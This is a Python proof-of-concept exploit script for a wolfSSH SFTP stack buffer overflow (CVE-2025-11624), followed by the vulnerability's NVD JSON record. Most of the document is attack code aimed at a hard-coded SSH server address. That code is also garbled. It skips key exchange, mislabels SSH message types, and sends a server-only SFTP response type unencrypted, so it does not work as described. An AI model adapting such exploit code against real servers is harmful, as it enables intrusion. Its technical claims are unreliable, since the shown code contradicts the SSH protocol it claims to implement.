CVE-2025-11624

# CVE-2025-11624 wolfSSH SFTP Stack Buffer Overflow PoC # This PoC demonstrates the vulnerability by sending a malicious SFTP packet # with an oversized handle field to trigger stack buffer overwrite. import socket import struct import hashlib import os # Target configuration TARGET_HOST = "192.168.1.100" TARGET_PORT = 22 # SSH protocol constants SSH_MSG_KEXINIT = 20 SSH_MSG_NEWKEYS = 21 SSH_MSG_CHANNEL_OPEN = 90 SSH_MSG_CHANNEL_REQUEST = 98 SSH_MSG_SUBSYSTEM_REQUEST = 98 def build_ssh_packet(payload_type, payload): """Build an SSH packet with proper framing""" packet_length = 1 + len(payload) # type byte + payload padding_length = 8 - ((packet_length + 5) % 8) if padding_length < 4: padding_length += 8 packet = struct.pack('>I', packet_length + padding_length) packet += struct.pack('B', padding_length) packet += struct.pack('B', payload_type) packet += payload packet += os.urandom(padding_length) return packet def send_sftp_handle_overflow(target_host, target_port): """ Send a malicious SFTP packet with oversized handle to trigger CVE-2025-11624 stack buffer overflow in wolfSSH SFTP server. The handle size is crafted to be: - Larger than system file descriptor size (typically 4 or 8 bytes) - Smaller than the maximum allowed handle size in wolfSSH """ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) try: # Step 1: TCP connection sock.connect((target_host, target_port)) print(f"[+] Connected to {target_host}:{target_port}") # Step 2: SSH version exchange sock.send(b"SSH-2.0-OpenSSH_8.9p1\r\n") version = sock.recv(256) print(f"[+] Server version: {version.strip()}") # Step 3: Key exchange initialization (simplified) # In a real exploit, full SSH key exchange would be performed kexinit_payload = b'\x00' * 16 # cookie kexinit_payload += b'\x00\x14' + b'diffie-hellman-group14-sha256' kexinit_payload += b'\x00\x0a' + b'ssh-rsa' # ... additional algorithm negotiation sock.send(build_ssh_packet(SSH_MSG_KEXINIT, kexinit_payload)) # Step 4: After key exchange, open SFTP subsystem channel # ... (channel open, subsystem request) # Step 5: Send malicious SFTP packet with oversized handle # SFTP_FXP_HANDLE packet type = 102 sftp_packet_type = b'\x66' # 102 in decimal = SFTP_FXP_HANDLE response request_id = struct.pack('>I', 1) # Craft handle size: larger than fd size (8 bytes) but < max allowed # Typical wolfSSH max handle size is around 256 bytes malicious_handle_size = 128 # Triggers the overflow condition handle_data = b'A' * malicious_handle_size malicious_payload = sftp_packet_type + request_id malicious_payload += struct.pack('>I', malicious_handle_size) malicious_payload += handle_data sock.send(build_ssh_packet(SSH_MSG_SUBSYSTEM_REQUEST, malicious_payload)) print(f"[+] Sent malicious SFTP packet with handle size: {malicious_handle_size}") print("[+] If vulnerable, server may crash or execute attacker code") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": # WARNING: Only use against systems you own or have permission to test send_sftp_handle_overflow(TARGET_HOST, TARGET_PORT)

{"cve": {"id": "CVE-2025-11624", "sourceIdentifier": "[email protected]", "published": "2025-10-21T14:15:46.813", "lastModified": "2025-12-04T21:21:39.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Potential stack buffer overwrite on the SFTP server side when receiving a malicious packet that has a handle size larger than the system handle or file descriptor size, but smaller than max handle size allowed."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wolfssh:wolfssh:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.3.0", "versionEndIncluding": "1.4.20", "matchCriteriaId": "C689A0C6-F8F6-4E09-84BA-C88D71CC356E"}]}]}], "references": [{"url": "https://github.com/wolfSSL/wolfssh/pull/834", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}